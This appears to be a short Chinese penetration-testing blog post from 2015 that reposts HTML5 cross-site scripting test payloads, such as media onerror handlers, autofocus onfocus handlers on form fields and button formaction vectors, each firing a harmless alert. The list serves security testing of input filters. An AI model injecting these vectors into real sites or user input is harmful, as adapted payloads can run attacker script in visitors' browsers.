HTML5下的XSS测试代码

CracerCracer 2015-12-24 渗透测试 611 0 3

15416605799419643546

国外某童鞋收集整理的针对HTML5的

XSS测试代码

<video> <source onerror=”javascript:alert(1)”>

引入媒体类测试代码Example:
<video onerror=”javascript:alert(1)”><source>
<audio onerror=”javascript:alert(1)”><source>

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>

表单点击测试代码Example:
<button form=test onformchange=alert(2)>X
<form><button formaction=”javascript:alert(1)”>

 

转载请注明来自Cracer,本文标题:《HTML5下的XSS测试代码》

喜欢 (3) 发布评论
发表评论


Top